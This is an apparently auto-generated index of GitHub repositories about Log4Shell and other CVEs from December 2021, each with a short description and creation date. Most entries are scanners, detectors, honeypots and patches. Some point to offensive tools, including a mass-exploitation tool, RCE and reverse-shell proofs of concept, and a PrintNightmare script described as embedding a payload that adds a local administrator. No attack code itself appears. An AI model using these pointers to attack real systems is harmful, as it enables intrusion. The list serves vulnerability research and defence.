**A collection of IOCs for CVE-2021-44228 also known as Log4Shell** : [WatchGuard-Threat-Lab/log4shell-iocs](https://github.com/WatchGuard-Threat-Lab/log4shell-iocs) create time: 2021-12-17T15:58:14Z

**Log4Shell (CVE-2021-44228): descrizione, exploitation e rimedi** : [zane00/CVE-2021-44228](https://github.com/zane00/CVE-2021-44228) create time: 2021-12-17T10:36:16Z

**no description** : [TheArqsz/CVE-2021-44228-PoC](https://github.com/TheArqsz/CVE-2021-44228-PoC) create time: 2021-12-10T23:40:39Z

**Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.** : [metodidavidovic/log4j-quick-scan](https://github.com/metodidavidovic/log4j-quick-scan) create time: 2021-12-17T12:49:59Z

**The script "Py3-detect-log4j-12.2021.py" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228.** : [nx6110a5100/Py3-detect-log4j-12.2021](https://github.com/nx6110a5100/Py3-detect-log4j-12.2021) create time: 2021-12-17T13:09:19Z

**Windows MSI Installer LPE (CVE-2021-43883)** : [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff) create time: 2021-12-02T19:15:59Z

**Java application vulnerable to the CVE-2021-44228 (a.k.a log4shell) vulnerability** : [GroupePSA/log4shell-honeypot](https://github.com/GroupePSA/log4shell-honeypot) create time: 2021-12-17T10:32:39Z

**Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)** : [scheibling/py-log4shellscanner](https://github.com/scheibling/py-log4shellscanner) create time: 2021-12-17T10:06:07Z

**nginx 1.15.10 patch against cve-2021-23017 (ingress version)** : [niandy/nginx-patch](https://github.com/niandy/nginx-patch) create time: 2021-12-17T09:53:39Z

**Log4j2 Vulnerability (CVE-2021-44228)** : [RenYuH/log4j-lookups-vulnerability](https://github.com/RenYuH/log4j-lookups-vulnerability) create time: 2021-12-17T09:10:50Z

**CVE-2021-44228 vulnerability in Apache Log4j library** : [Heliferepo/log4j](https://github.com/Heliferepo/log4j) create time: 2021-12-17T08:48:59Z

**no description** : [rohankumardubey/CVE-2021-44228_scanner](https://github.com/rohankumardubey/CVE-2021-44228_scanner) create time: 2021-12-17T08:32:20Z

**CVE-2021-43798 Grafana任意文件读取** : [k3rwin/CVE-2021-43798-Grafana-](https://github.com/k3rwin/CVE-2021-43798-Grafana-) create time: 2021-12-17T07:03:32Z

**PoC RCE Log4j CVE-2021-4428 para pruebas** : [Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE](https://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE) create time: 2021-12-17T06:34:51Z

**An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.** : [redhuntlabs/Log4JHunt](https://github.com/redhuntlabs/Log4JHunt) create time: 2021-12-15T12:07:05Z

**A lab demonstration of the log4shell vulnerability: CVE-2021-44228** : [obscuritylabs/log4shell-poc-lab](https://github.com/obscuritylabs/log4shell-poc-lab) create time: 2021-12-17T04:20:40Z

**CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数** : [ScorpionsMAX/CVE-2021-43798-Grafana-POC](https://github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC) create time: 2021-12-07T10:43:30Z

**Test exploit of CVE-2021-44228** : [wajda/log4shell-test-exploit](https://github.com/wajda/log4shell-test-exploit) create time: 2021-12-17T01:50:22Z

**no description** : [AnYi-Sec/Log4j-CVE-2021-44228-EXP](https://github.com/AnYi-Sec/Log4j-CVE-2021-44228-EXP) create time: 2021-12-17T01:19:37Z

**Log4j - Multitool. Find & fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment** : [suuhm/log4shell4shell](https://github.com/suuhm/log4shell4shell) create time: 2021-12-16T23:13:09Z

**Log4Shell Proof of Concept (CVE-2021-44228)** : [Kr0ff/CVE-2021-44228](https://github.com/Kr0ff/CVE-2021-44228) create time: 2021-12-16T21:19:17Z

**Samples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.** : [mergebase/log4j-samples](https://github.com/mergebase/log4j-samples) create time: 2021-12-16T18:12:29Z

**no description** : [kannthu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce) create time: 2021-12-16T20:02:09Z

**no description** : [Vulnmachines/log4j-cve-2021-44228](https://github.com/Vulnmachines/log4j-cve-2021-44228) create time: 2021-12-16T18:42:08Z

**Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading** : [kal1gh0st/MyLog4Shell](https://github.com/kal1gh0st/MyLog4Shell) create time: 2021-12-16T17:21:22Z

**Detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!** : [mergebase/log4j-detector](https://github.com/mergebase/log4j-detector) create time: 2021-12-12T00:29:03Z

**Applications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class.** : [hozyx/log4shell](https://github.com/hozyx/log4shell) create time: 2021-12-16T17:22:17Z

**log4j mitigation work** : [axisops/CVE-2021-44228](https://github.com/axisops/CVE-2021-44228) create time: 2021-12-16T16:42:44Z

**no description** : [shubhayu-64/CVE-2021-38314](https://github.com/shubhayu-64/CVE-2021-38314) create time: 2021-12-16T15:27:59Z

**Log4Shell CVE-2021-44228 Vulnerability Scanner and POC** : [gyaansastra/CVE-2021-44228](https://github.com/gyaansastra/CVE-2021-44228) create time: 2021-12-16T15:04:23Z

**CVE-2021-44228-Apache-Log4j** : [lonecloud/CVE-2021-44228-Apache-Log4j](https://github.com/lonecloud/CVE-2021-44228-Apache-Log4j) create time: 2021-12-16T14:31:14Z

**Scanner local em Python para varredura e localização de versões vulneráveis do Log4j2, contemplando análise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)** : [andalik/log4j-scanner](https://github.com/andalik/log4j-scanner) create time: 2021-12-16T14:29:05Z

**no description** : [d3w201/CVE-2021-44228](https://github.com/d3w201/CVE-2021-44228) create time: 2021-12-16T14:14:38Z

**A honeypot for the Log4Shell vulnerability (CVE-2021-44228).** : [thomaspatzke/Log4Pot](https://github.com/thomaspatzke/Log4Pot) create time: 2021-12-15T22:30:34Z

**Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046** : [DXC-StrikeForce/Burp-Log4j-HammerTime](https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime) create time: 2021-12-16T13:25:03Z

**Basic Vulnerable Spring Boot Application to Test CVE-2021-44228** : [recanavar/vuln_spring_log4j2](https://github.com/recanavar/vuln_spring_log4j2) create time: 2021-12-16T13:05:38Z

**Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)** : [korteke/log4shell-demo](https://github.com/korteke/log4shell-demo) create time: 2021-12-16T12:44:24Z

**Simple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228)** : [Gyrfalc0n/scanlist-log4j](https://github.com/Gyrfalc0n/scanlist-log4j) create time: 2021-12-16T12:20:00Z

**Local Bytecode Scanner for Log4JShell Vulnerability (CVE-2021-44228)** : [CodeShield-Security/Log4JShell-Bytecode-Detector](https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector) create time: 2021-12-12T11:28:34Z

**Stored XSS found in Vehicle Service Management System 1.0 application in Sourcecodester.** : [lohyt/-CVE-2021-41962](https://github.com/lohyt/-CVE-2021-41962) create time: 2021-12-16T10:52:13Z

**CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.** : [Joefreedy/Log4j-Windows-Scanner](https://github.com/Joefreedy/Log4j-Windows-Scanner) create time: 2021-12-16T10:37:16Z

**Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件** : [snow0715/log4j-Scan-Burpsuite](https://github.com/snow0715/log4j-Scan-Burpsuite) create time: 2021-12-16T09:58:02Z

**log4shell (CVE-2021-44228) scanning tool** : [shamo0/CVE-2021-44228](https://github.com/shamo0/CVE-2021-44228) create time: 2021-12-16T09:26:37Z

**This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce** : [roxas-tan/CVE-2021-44228](https://github.com/roxas-tan/CVE-2021-44228) create time: 2021-12-16T08:46:55Z

**log4j vulnerability wrapper scanner for CVE-2021-44228** : [dpomnean/log4j_scanner_wrapper](https://github.com/dpomnean/log4j_scanner_wrapper) create time: 2021-12-16T03:57:41Z

**This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability).** : [rv4l3r3/log4v-vuln-check](https://github.com/rv4l3r3/log4v-vuln-check) create time: 2021-12-16T01:38:25Z

**log4j (CVE-2021-44228) Spring-boot web application with vulnerabilities** : [Auddn/ITF-log4shell-vulnapp](https://github.com/Auddn/ITF-log4shell-vulnapp) create time: 2021-12-14T08:21:11Z

**A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)** : [ubitech/cve-2021-44228-rce-poc](https://github.com/ubitech/cve-2021-44228-rce-poc) create time: 2021-12-15T23:00:25Z

**Небольшой мод направленный на устранение уязвимости CVE-2021-44228** : [LemonCraftRu/JndiRemover](https://github.com/LemonCraftRu/JndiRemover) create time: 2021-12-11T15:48:03Z

**CVE-2021-39685 Description and sample exploit for Linux USB Gadget overflow vulnerability** : [szymonh/inspector-gadget](https://github.com/szymonh/inspector-gadget) create time: 2021-12-15T14:28:00Z

**Dockerized honeypot for CVE-2021-44228.** : [michaelsanford/Log4Shell-Honeypot](https://github.com/michaelsanford/Log4Shell-Honeypot) create time: 2021-12-15T21:09:00Z

**no description** : [aws-samples/kubernetes-log4j-cve-2021-44228-node-agent](https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent) create time: 2021-12-15T20:17:41Z

**Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)** : [stripe/log4j-remediation-tools](https://github.com/stripe/log4j-remediation-tools) create time: 2021-12-14T21:47:04Z

**Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell** : [pmontesd/log4j-cve-2021-44228](https://github.com/pmontesd/log4j-cve-2021-44228) create time: 2021-12-15T19:21:39Z

**no description** : [pravin-pp/log4j2-CVE-2021-45046](https://github.com/pravin-pp/log4j2-CVE-2021-45046) create time: 2021-12-15T19:19:52Z

**To determine if a host is vulnerable to log4j CVE‐2021‐44228** : [yahoo/check-log4j](https://github.com/yahoo/check-log4j) create time: 2021-12-15T18:47:39Z

**we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them** : [mitiga/log4shell-cloud-scanner](https://github.com/mitiga/log4shell-cloud-scanner) create time: 2021-12-15T15:42:06Z

**An automated header extensive scanner for detecting log4j RCE CVE-2021-44228** : [alenazi90/log4j](https://github.com/alenazi90/log4j) create time: 2021-12-15T19:15:00Z

**A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228** : [isuruwa/Log4j](https://github.com/isuruwa/Log4j) create time: 2021-12-15T16:01:36Z

**CVE-2021-44228 demo webapp** : [MkTech-0-8YT3/CVE-2021-44228](https://github.com/MkTech-0-8YT3/CVE-2021-44228) create time: 2021-12-15T17:42:13Z

**Honeypot for CVE-2021-44228** : [wortell/log4j-honeypot](https://github.com/wortell/log4j-honeypot) create time: 2021-12-15T16:29:37Z

**Replicating CVE-2021-45046** : [tejas-nagchandi/CVE-2021-45046](https://github.com/tejas-nagchandi/CVE-2021-45046) create time: 2021-12-15T16:28:11Z

**Scans for Log4j versions effected by CVE-2021-44228** : [inettgmbh/checkmk-log4j-scanner](https://github.com/inettgmbh/checkmk-log4j-scanner) create time: 2021-12-15T16:21:26Z

**Data we are receiving from our honeypots about CVE-2021-44228** : [honeynet/log4shell-data](https://github.com/honeynet/log4shell-data) create time: 2021-12-15T16:10:54Z

**no description** : [fasanhlieu/CVE-2021-2394](https://github.com/fasanhlieu/CVE-2021-2394) create time: 2021-12-15T16:09:54Z

**no description** : [numanturle/CVE-2021-23758-POC](https://github.com/numanturle/CVE-2021-23758-POC) create time: 2021-12-15T15:40:45Z

**fix cve 44228 for windows** : [sebiboga/jmeter-fix-cve-2021-44228-windows](https://github.com/sebiboga/jmeter-fix-cve-2021-44228-windows) create time: 2021-12-15T15:34:19Z

**a script to locally check jars and packages for log4j CVE‐2021‐44228** : [jschauma/check-log4j](https://github.com/jschauma/check-log4j) create time: 2021-12-15T15:29:49Z

**HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.** : [g30rgyth3d4rk/cve-2021-45043](https://github.com/g30rgyth3d4rk/cve-2021-45043) create time: 2021-12-15T15:01:31Z

**no description** : [robertdebock/ansible-role-cve_2021_44228](https://github.com/robertdebock/ansible-role-cve_2021_44228) create time: 2021-12-15T14:53:17Z

**A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related)** : [MeterianHQ/log4j-vuln-coverage-check](https://github.com/MeterianHQ/log4j-vuln-coverage-check) create time: 2021-12-15T14:44:14Z

**Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions** : [mss/log4shell-hotfix-side-effect](https://github.com/mss/log4shell-hotfix-side-effect) create time: 2021-12-15T13:14:34Z

**no description** : [Junhyunny/log4j-vulnerability-CVE-2021-44228](https://github.com/Junhyunny/log4j-vulnerability-CVE-2021-44228) create time: 2021-12-15T11:36:20Z

**This repository is designed to be a collection of resources to learn about, detect and mitigate the impact of the Log4j vulnerability - more formally known as CVE-2021-44228 and CVE-2021-45046 (mirror from GitLab.com)** : [gitlab-de/log4j-resources](https://github.com/gitlab-de/log4j-resources) create time: 2021-12-15T11:34:02Z

**Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228** : [jyotisahu98/logpresso-CVE-2021-44228-Scanner](https://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner) create time: 2021-12-15T11:15:25Z

**Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228** : [kubearmor/log4j-cve](https://github.com/kubearmor/log4j-cve) create time: 2021-12-15T10:55:35Z

**Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228** : [KeysAU/Get-log4j-Windows.ps1](https://github.com/KeysAU/Get-log4j-Windows.ps1) create time: 2021-12-15T10:49:36Z

**Oh no another one** : [BobTheShoplifter/CVE-2021-45046-Info](https://github.com/BobTheShoplifter/CVE-2021-45046-Info) create time: 2021-12-15T09:01:37Z

**no description** : [anuvindhs/how-to-check-patch-secure-logj4-CVE-2021-45046](https://github.com/anuvindhs/how-to-check-patch-secure-logj4-CVE-2021-45046) create time: 2021-12-15T07:51:28Z

**A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations** : [rgl/log4j-log4shell-playground](https://github.com/rgl/log4j-log4shell-playground) create time: 2021-12-15T07:51:12Z

**no description** : [avirahul007/CVE-2021-44228](https://github.com/avirahul007/CVE-2021-44228) create time: 2021-12-15T06:40:35Z

**no description** : [i6c/MASS_CVE-2021-41773](https://github.com/i6c/MASS_CVE-2021-41773) create time: 2021-12-15T06:04:41Z

**Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046** : [cckuailong/Log4j_CVE-2021-45046](https://github.com/cckuailong/Log4j_CVE-2021-45046) create time: 2021-12-15T05:48:53Z

**This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228** : [bhprin/log4j-vul](https://github.com/bhprin/log4j-vul) create time: 2021-12-15T05:19:13Z

**Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228** : [VinniMarcon/Log4j-Updater](https://github.com/VinniMarcon/Log4j-Updater) create time: 2021-12-15T04:08:15Z

**Quick Deploy to show case cve-2021-44228** : [JustinDPerkins/C1-WS-LOG4SHELL](https://github.com/JustinDPerkins/C1-WS-LOG4SHELL) create time: 2021-12-15T03:20:25Z

**Log4j2 jndi injection fuzz tool (CVE-2021-44228)** : [zhzyker/logmap](https://github.com/zhzyker/logmap) create time: 2021-12-14T08:41:18Z

**Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested.** : [jeremyrsellars/CVE-2021-44228_scanner](https://github.com/jeremyrsellars/CVE-2021-44228_scanner) create time: 2021-12-15T02:31:14Z

**Scanning for CVE-2021-44228** : [dbzoo/log4j_scanner](https://github.com/dbzoo/log4j_scanner) create time: 2021-12-15T02:29:34Z

**no description** : [eR072391/cve-2021-21315](https://github.com/eR072391/cve-2021-21315) create time: 2021-12-15T01:15:56Z

**Scanners for Jar files that may be vulnerable to CVE-2021-44228** : [CERTCC/CVE-2021-44228_scanner](https://github.com/CERTCC/CVE-2021-44228_scanner) create time: 2021-12-14T23:33:51Z

**CVE-2021-44228 Response Scripts** : [0xThiebaut/CVE-2021-44228](https://github.com/0xThiebaut/CVE-2021-44228) create time: 2021-12-14T22:50:05Z

**Log4j CVE-2021-44228 finder and patcher** : [xsultan/log4jshield](https://github.com/xsultan/log4jshield) create time: 2021-12-14T22:22:15Z

**CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists.** : [razz0r/CVE-2021-44228-Mass-RCE](https://github.com/razz0r/CVE-2021-44228-Mass-RCE) create time: 2021-12-14T22:19:29Z

**no description** : [ab0x90/CVE-2021-44228_PoC](https://github.com/ab0x90/CVE-2021-44228_PoC) create time: 2021-12-14T21:32:42Z

**A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.** : [mufeedvh/log4jail](https://github.com/mufeedvh/log4jail) create time: 2021-12-14T19:29:11Z

**A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x "JNDI LDAP" vulnerability.** : [nccgroup/log4j-jndi-be-gone](https://github.com/nccgroup/log4j-jndi-be-gone) create time: 2021-12-12T15:29:20Z

**Simple Spring Boot application vulnerable to CVE-2021-44228** : [guerzon/log4shellpoc](https://github.com/guerzon/log4shellpoc) create time: 2021-12-14T20:27:26Z

**Generate CVE-2021-44228 commands to test servers with ease!** : [csduncan9/Log4j-CVE-2021-44228-command-generator](https://github.com/csduncan9/Log4j-CVE-2021-44228-command-generator) create time: 2021-12-14T20:12:07Z

**Tools for investigating Log4j CVE-2021-44228** : [MalwareTech/Log4jTools](https://github.com/MalwareTech/Log4jTools) create time: 2021-12-14T19:08:14Z

**Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228)** : [hupe1980/scan4log4shell](https://github.com/hupe1980/scan4log4shell) create time: 2021-12-13T06:09:04Z

**MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)** : [p0dalirius/CVE-2016-10956_mail_masta](https://github.com/p0dalirius/CVE-2016-10956_mail_masta) create time: 2021-12-10T16:06:46Z

**Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228** : [BinaryDefense/log4j-honeypot-flask](https://github.com/BinaryDefense/log4j-honeypot-flask) create time: 2021-12-14T18:08:45Z

**no description** : [municipalparkingservices/CVE-2021-44228-Scanner](https://github.com/municipalparkingservices/CVE-2021-44228-Scanner) create time: 2021-12-14T17:53:37Z

**Grafana8.x 任意文件读取** : [Ryze-T/CVE-2021-43798](https://github.com/Ryze-T/CVE-2021-43798) create time: 2021-12-14T17:05:41Z

**no description** : [yanicksenn/CVE-2021-44228](https://github.com/yanicksenn/CVE-2021-44228) create time: 2021-12-14T16:42:45Z

**A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.** : [0xInfection/LogMePwn](https://github.com/0xInfection/LogMePwn) create time: 2021-12-14T06:37:59Z

**Log4j** : [corelight/cve-2021-44228](https://github.com/corelight/cve-2021-44228) create time: 2021-12-13T17:25:52Z

**no description** : [robiul-awal/CVE-2018-15473](https://github.com/robiul-awal/CVE-2018-15473) create time: 2021-12-14T15:48:11Z

**no description** : [faisalfs10x/Log4j2-CVE-2021-44228-revshell](https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell) create time: 2021-12-14T05:24:52Z

**Repo containing all info, scripts, etc. related to CVE-2021-44228** : [wortell/log4j](https://github.com/wortell/log4j) create time: 2021-12-14T15:13:06Z

**CVE-2021-44228** : [ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228](https://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228) create time: 2021-12-14T14:51:26Z

**The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.** : [ReynerGonzalez/Security-Log4J-Tester](https://github.com/ReynerGonzalez/Security-Log4J-Tester) create time: 2021-12-14T14:46:08Z

**no description** : [didoatanasov/cve-2021-44228](https://github.com/didoatanasov/cve-2021-44228) create time: 2021-12-14T12:47:56Z

**Details : CVE-2021-44228** : [34zY/JNDI-Exploit-1.2-log4shell](https://github.com/34zY/JNDI-Exploit-1.2-log4shell) create time: 2021-12-14T12:42:54Z

**no description** : [rwincey/CVE-2021-44228-Log4j-Payloads](https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads) create time: 2021-12-14T12:37:23Z

**Detect vulnerable machines to Log4Shell (CVE-2021-44228)** : [e-XpertSolutions/log4find](https://github.com/e-XpertSolutions/log4find) create time: 2021-12-14T08:49:37Z

**Bash and PowerShell scripts to scan a local filesystem for Log4j components vulnerable to CVE-2021-44228 / Log4Shell.** : [Occamsec/log4j-checker](https://github.com/Occamsec/log4j-checker) create time: 2021-12-13T21:11:18Z

**Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)** : [fox-it/log4j-finder](https://github.com/fox-it/log4j-finder) create time: 2021-12-14T10:04:42Z

**On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short.** : [jan-muhammad-zaidi/Log4j-CVE-2021-44228](https://github.com/jan-muhammad-zaidi/Log4j-CVE-2021-44228) create time: 2021-12-14T09:33:22Z

**Little recap of the log4j2 remote code execution (CVE-2021-44228)** : [cbuschka/log4j2-rce-recap](https://github.com/cbuschka/log4j2-rce-recap) create time: 2021-12-14T08:31:47Z

**A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers.** : [NorthwaveSecurity/log4jcheck](https://github.com/NorthwaveSecurity/log4jcheck) create time: 2021-12-10T14:22:49Z

**Endpoint to test CVE-2021-44228 – Log4j 2** : [andrii-kovalenko-celonis/log4j-vulnerability-demo](https://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo) create time: 2021-12-14T08:55:43Z

**The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to show how to fix it.** : [chilit-nl/log4shell-example](https://github.com/chilit-nl/log4shell-example) create time: 2021-12-13T20:54:10Z

**Check CVE-2021-44228 vulnerability** : [codiobert/log4j-scanner](https://github.com/codiobert/log4j-scanner) create time: 2021-12-14T07:59:14Z

**The LPE technique does not need to work with remote RPC or SMB, as it is only working with the functions of Print Spooler. * This script embeds a Base64-encoded GZIPped payload for a custom DLL, that is patched according to your arguments, to easily add a new user to the local administrators group. * This script embeds methods from PowerSploit/[PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) to reflectively access the Win32 APIs. * This method does not loop through all printer drivers to find the appropriate DLL path -- it simply grabs the first driver and determines the appropriate path.** : [sh7alward/CVE-20121-34527-nightmare](https://github.com/sh7alward/CVE-20121-34527-nightmare) create time: 2021-12-14T07:03:19Z

**A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228** : [toramanemre/apache-solr-log4j-CVE-2021-44228](https://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228) create time: 2021-12-14T06:51:30Z

**CVE 2021-14527** : [sh7alward/Nightmare-](https://github.com/sh7alward/Nightmare-) create time: 2021-12-14T06:49:32Z

**Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228** : [gcmurphy/chk_log4j](https://github.com/gcmurphy/chk_log4j) create time: 2021-12-14T05:58:28Z

**no description** : [zjx/CVE-2021-44228](https://github.com/zjx/CVE-2021-44228) create time: 2021-12-14T05:48:49Z

**Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading** : [Woahd/log4j-urlscanner](https://github.com/Woahd/log4j-urlscanner) create time: 2021-12-14T04:35:20Z

**no description** : [archongum/cve-2021-44228-log4j](https://github.com/archongum/cve-2021-44228-log4j) create time: 2021-12-14T04:25:13Z

**no description** : [roticagas/CVE-2021-44228-Demo](https://github.com/roticagas/CVE-2021-44228-Demo) create time: 2021-12-14T04:09:02Z

**no description** : [eR072391/cve-2021-44228](https://github.com/eR072391/cve-2021-44228) create time: 2021-12-14T03:45:48Z

**Sample docker-compose setup to show how this exploit works** : [alpacamybags118/log4j-cve-2021-44228-sample](https://github.com/alpacamybags118/log4j-cve-2021-44228-sample) create time: 2021-12-14T02:26:52Z

**Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228** : [sandarenu/log4j2-issue-check](https://github.com/sandarenu/log4j2-issue-check) create time: 2021-12-14T02:26:56Z

**Prova de conceito da vulnerabulidade CVE-2021-44228.** : [igoritos22/log4jpoc](https://github.com/igoritos22/log4jpoc) create time: 2021-12-13T23:19:41Z

**Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)** : [ly4k/Pachine](https://github.com/ly4k/Pachine) create time: 2021-12-13T23:15:05Z

**Find log4j for CVE-2021-44228 on some places * Log4Shell** : [perryflynn/find-log4j](https://github.com/perryflynn/find-log4j) create time: 2021-12-13T22:26:04Z

**Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228** : [alexbakker/log4shell-tools](https://github.com/alexbakker/log4shell-tools) create time: 2021-12-13T21:47:41Z

**PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs** : [back2root/log4shell-rex](https://github.com/back2root/log4shell-rex) create time: 2021-12-13T21:39:51Z

**A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228).** : [Koupah/MC-Log4j-Patcher](https://github.com/Koupah/MC-Log4j-Patcher) create time: 2021-12-13T14:26:24Z

**Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS** : [name/log4j-scanner](https://github.com/name/log4j-scanner) create time: 2021-12-13T22:11:15Z

**GitHub CodeQL Action to scan for CVE-2021–44228** : [benarculus/cve-2021-44228-code-scan](https://github.com/benarculus/cve-2021-44228-code-scan) create time: 2021-12-13T21:57:58Z

**Professional Service scripts to aid in the identification of affected Java applications in TeamServer** : [Contrast-Security-OSS/CVE-2021-44228](https://github.com/Contrast-Security-OSS/CVE-2021-44228) create time: 2021-12-13T21:39:39Z

**Just a personal proof of concept of CVE-2021-44228 on log4j2** : [snatalius/log4j2-CVE-2021-44228-poc-local](https://github.com/snatalius/log4j2-CVE-2021-44228-poc-local) create time: 2021-12-13T21:21:53Z

**exploit for DNS 4.3** : [stoicboomer/CVE-2013-6987](https://github.com/stoicboomer/CVE-2013-6987) create time: 2020-02-13T21:42:24Z

**no description** : [tica506/Splunk-query-for-CVE-2021-44228](https://github.com/tica506/Splunk-query-for-CVE-2021-44228) create time: 2021-12-13T20:19:57Z

**Nmap NSE script for discovery Apache log4j RCE (CVE-2021-44228)** : [giterlizzi/nmap-log4shell](https://github.com/giterlizzi/nmap-log4shell) create time: 2021-12-13T20:17:14Z

**NGINX njs based request inspection configuration for IOCs of Log4Shell vulnerability** : [tippexs/nginx-njs-waf-cve2021-44228](https://github.com/tippexs/nginx-njs-waf-cve2021-44228) create time: 2021-12-13T20:02:12Z

**Demonstration of CVE-2021-44228 with a possible strategic fix.** : [strawhatasif/log4j-test](https://github.com/strawhatasif/log4j-test) create time: 2021-12-13T19:43:01Z

**Using code search to help fix/mitigate log4j CVE-2021-44228** : [sourcegraph/log4j-cve-code-search-resources](https://github.com/sourcegraph/log4j-cve-code-search-resources) create time: 2021-12-13T07:10:11Z

**Compiling links of value i find regarding CVE-2021-44228** : [ben-smash/l4j-info](https://github.com/ben-smash/l4j-info) create time: 2021-12-13T19:14:23Z

**no description** : [mcedica/fix-cve-2021-44228](https://github.com/mcedica/fix-cve-2021-44228) create time: 2021-12-13T18:55:55Z

**Public IOCs about log4j CVE-2021-44228** : [threatmonit/Log4j-IOCs](https://github.com/threatmonit/Log4j-IOCs) create time: 2021-12-13T18:52:19Z

**Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.** : [lfama/log4j_checker](https://github.com/lfama/log4j_checker) create time: 2021-12-13T18:35:16Z

**CVE-2021-44228** : [trevalkov/log4j2-prosecutor](https://github.com/trevalkov/log4j2-prosecutor) create time: 2021-12-13T17:32:26Z

**Log4Shell A test for CVE-2021-44228** : [yanghaoi/CVE-2021-44228_Log4Shell](https://github.com/yanghaoi/CVE-2021-44228_Log4Shell) create time: 2021-12-13T17:44:01Z

**File transfers using the log4shell vulnerability (CVE-2021-44228)** : [Chelsea486MHz/ftp_over_log4j](https://github.com/Chelsea486MHz/ftp_over_log4j) create time: 2021-12-13T17:26:49Z

**Automox Windows Agent Privilege Escalation Exploit** : [gfoss/CVE-2021-43326_Exploit](https://github.com/gfoss/CVE-2021-43326_Exploit) create time: 2021-12-13T17:26:28Z

**no description** : [taurusxin/CVE-2021-44228](https://github.com/taurusxin/CVE-2021-44228) create time: 2021-12-13T17:17:37Z

